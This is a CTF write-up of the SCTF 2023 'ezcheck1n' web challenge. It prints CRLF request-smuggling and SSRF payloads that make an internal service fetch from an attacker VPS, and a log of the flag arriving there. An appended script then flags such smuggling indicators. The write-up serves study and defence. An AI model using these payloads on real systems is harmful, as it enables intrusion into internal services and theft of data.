SCTF Web Challenge Reproduction

ezcheck1n

At the time I had read every request-smuggling challenge to death, and tried every combination of the Host header before and after the smuggled request, as well as /2023 and /2022, and in the end, reading the writeup, I found that the question mark in the smuggled GET request has to be encoded... I can't believe myself.

Final payload:

GET /2023/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/2022.php%3furl=ip:port/?flag=1 HTTP/1.1

Analysis of NU1L's payload

GET /2023/&url=172.20.0.2:8080/2022.php%253furl=vps:port/ss HTTP/1.1
Host: 115.239.215.75:8082
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Assuming the proxy forwards to ./2023.php, the URL after the front-end proxy is presumably: http://115.239.215.75:8082/2023.php/&url=172.20.0.2:8080/2022.php%253furl=1.117.247.14:8000/ss

From the error message (triggered by sending HTTP/111.1) we learn that the host actually serving the internal service is 172.20.0.2:8080.

Combining this with the request parameters my Tencent Cloud server actually received:

115.239.215.75 - - [20/Jun/2023 11:41:07] code 404, message File not found
115.239.215.75 - - [20/Jun/2023 11:41:07] "GET /ssflag{fake_flag}?flag=SCTF{we1c0me_t0_SCTF2023&SYC_LOVE_YOU} HTTP/1.1" 404 -

The internal host executed 2023.php (since the fake flag was attached), and then went on to execute 2022.php. In other words, by passing http://115.239.215.75:8082/2022.php?url=vps:port to file_get_contents, the file function in 2023.php actually made two HTTP requests.

What I can't figure out is why there is a flag= form at all: the payload only has a url parameter, no flag parameter.

This is as far as I can analyse the principle behind this payload; digging any deeper would probably require looking at the source. The world of the strong really is beyond understanding.
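As an added illustration that is not part of this writeup or of NU1L's analysis: the script below splits request targets the way a front-end proxy does (first unencoded `?` ends the path) and then decodes once, which is the model of the back end assumed here. It shows why the inner `?` has to be sent as `%3f` (with a raw `?` the outer parser swallows everything after it as the outer query string, so the smuggled request loses its own query), and it flags the indicators a log reviewer would look for: a line break or an `HTTP/x.y` version token appearing inside a decoded request target. The three sample request lines are constructed for this example; `ip:port` and `example.internal` are placeholders.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample request lines as a front-end proxy or access-log reviewer
# would see them. The first is the working payload from the writeup; the second
# is the same payload with the inner '?' left unencoded (the variant that fails);
# the third is an ordinary request for contrast. "ip:port" is a placeholder.
SAMPLE_REQUEST_LINES = [
    "GET /2023/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/2022.php%3furl=ip:port/?flag=1 HTTP/1.1",
    "GET /2023/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/2022.php?url=ip:port/ HTTP/1.1",
    "GET /2023/index.php?url=http://example.internal/ HTTP/1.1",
]

# A request target must never contain a protocol version token or a raw line
# break; either one means a second request line or header is being injected.
VERSION_TOKEN_RE = re.compile(r"HTTP/\d\.\d")
LINE_BREAK_RE = re.compile(r"[\r\n]")


def analyse(request_line):
    """Split a request line the way a proxy does and flag smuggling indicators."""
    method, target, version = request_line.split(" ", 2)
    parts = urlsplit(target)          # the first unencoded '?' ends the path
    decoded_target = unquote(target)  # assumption: the back end decodes once
    return {
        "method": method,
        "path": parts.path,
        "query": parts.query,
        # An encoded '?' surviving in the path is what lets the inner request
        # keep its own query string after the back end's decode.
        "encoded_query_delim_in_path": "%3f" in parts.path.lower(),
        "line_break_in_target": bool(LINE_BREAK_RE.search(decoded_target)),
        "version_token_in_target": bool(VERSION_TOKEN_RE.search(decoded_target)),
    }


def suspicious_lines(request_lines):
    """Return the indexes of request lines that carry a smuggling indicator."""
    hits = []
    for i, line in enumerate(request_lines):
        info = analyse(line)
        if info["line_break_in_target"] or info["version_token_in_target"]:
            hits.append(i)
    return hits


if __name__ == "__main__":
    for line in SAMPLE_REQUEST_LINES:
        info = analyse(line)
        print(f"path={info['path']!r}\n  query={info['query']!r}\n  "
              f"encoded ? in path={info['encoded_query_delim_in_path']} "
              f"line break={info['line_break_in_target']} "
              f"version token={info['version_token_in_target']}")
    print("suspicious:", suspicious_lines(SAMPLE_REQUEST_LINES))
```

Running it shows the first sample keeping `/2022.php%3furl=ip:port/` in the path with `flag=1` as the outer query, while the second sample's path is cut at `/2022.php` and `url=ip:port/` becomes the outer query instead, which is exactly why that variant never worked. Both are flagged by the line-break and version-token checks; the plain request is not.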